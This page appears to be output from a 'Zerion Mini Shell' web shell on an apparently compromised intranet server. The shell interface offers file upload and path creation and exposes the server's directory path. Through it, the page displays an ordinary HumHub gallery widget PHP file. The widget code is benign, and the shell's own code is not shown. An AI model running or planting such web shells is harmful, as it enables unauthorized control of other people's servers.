%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/intranet.vacivitta.com.br/protected/modules/gallery/widgets/
Upload File :
Create Path :
Current File : /home/vacivi36/intranet.vacivitta.com.br/protected/modules/gallery/widgets/GalleryListEntry.php

<?php

/**
 * @link https://www.humhub.org/
 * @copyright Copyright (c) 2015 HumHub GmbH & Co. KG
 * @license https://www.humhub.com/licences
 */

namespace humhub\modules\gallery\widgets;

use humhub\libs\Html;
use humhub\modules\content\widgets\richtext\RichText;
use humhub\modules\file\models\File;
use humhub\modules\gallery\helpers\Url;
use humhub\modules\gallery\libs\FileUtils;
use humhub\modules\gallery\models\BaseGallery;
use humhub\modules\gallery\models\Media;
use humhub\modules\gallery\models\SquarePreviewImage;
use \yii\base\Widget;
use \Yii;

/**
 * Widget that renders an entry inside a list in the gallery module
 *
 * @package humhub.modules.gallery.widgets
 * @since 1.0
 * @author Sebastian Stumpf
 */
class GalleryListEntry extends Widget
{

    public $entryObject;
    public $parentGallery;

    public function run()
    {
        if ($this->entryObject instanceof Media) {
            $metaData = $this->getMediaMetaData($this->entryObject);
            $metaData['showTooltip'] = true;
        } elseif ($this->entryObject instanceof File || is_array($this->entryObject)) { // Stream gallery entries are returned as arrays and not as objects
            $metaData = $this->getFileMetaData($this->entryObject);
            $metaData['showTooltip'] = false;
        } elseif ($this->entryObject instanceof BaseGallery) {
            $metaData = $this->entryObject->getMetaData();
            $metaData['showTooltip'] = true;
        } else {
            return;
        }

        $metaData['creatorUrl'] = !empty($metaData['creator']) ? $metaData['creator']->createUrl() : '';
        $metaData['creatorThumbnailUrl'] = !empty($metaData['creator'])  ? $metaData['creator']->getProfileImage()->getUrl() : '';
        $metaData['uiGalleryId'] = $this->parentGallery ? "GalleryModule-Gallery-" . $this->parentGallery->id : '';

        return $this->render('galleryListEntry', $metaData);
    }

    private function getMediaMetaData(Media $media)
    {
        $contentContainer = Yii::$app->controller->contentContainer;

        return [
            'creator' => '', // not in use
            'title' => $media->description,
            'wallUrl' => $media->getWallUrl(),
            'deleteUrl' => Url::toDeleteMedia($contentContainer, $media->id),
            'editUrl' => Url::toEditMedia($contentContainer, $media),
            'downloadUrl' =>$media->getFileUrl(true),
            'fileUrl' => $media->getFileUrl(),
            'thumbnailUrl' => $media->getSquarePreviewImageUrl(),
            'writeAccess' => $media->content->canEdit(),
            'contentObject' => $media,
            'footerOverwrite' => false,
            'alwaysShowHeading' => false,
            'imagePadding' => ''
        ];
    }

    private function getFileMetaData($model)
    {
        $file = $model instanceof File ? $model : File::findOne($model['id']);
        $contentObject = FileUtils::getBaseObject($file);
        $content = $contentObject->content;

        return [
            'creator' => '', // not in use
            'title' => $file->file_name,
            'wallUrl' => $content->getUrl(),
            'deleteUrl' => '',
            'editUrl' => '',
            'downloadUrl' => $file->getUrl(['download' => true]),
            'fileUrl' =>  $file->getUrl(),
            'thumbnailUrl' => SquarePreviewImage::getSquarePreviewImageUrlFromFile($file),
            'writeAccess' => false,
            'contentObject' => $contentObject,
            'footerOverwrite' => false,
            'alwaysShowHeading' => false,
            'imagePadding' => ''
        ];
    }
}

Zerion Mini Shell 1.0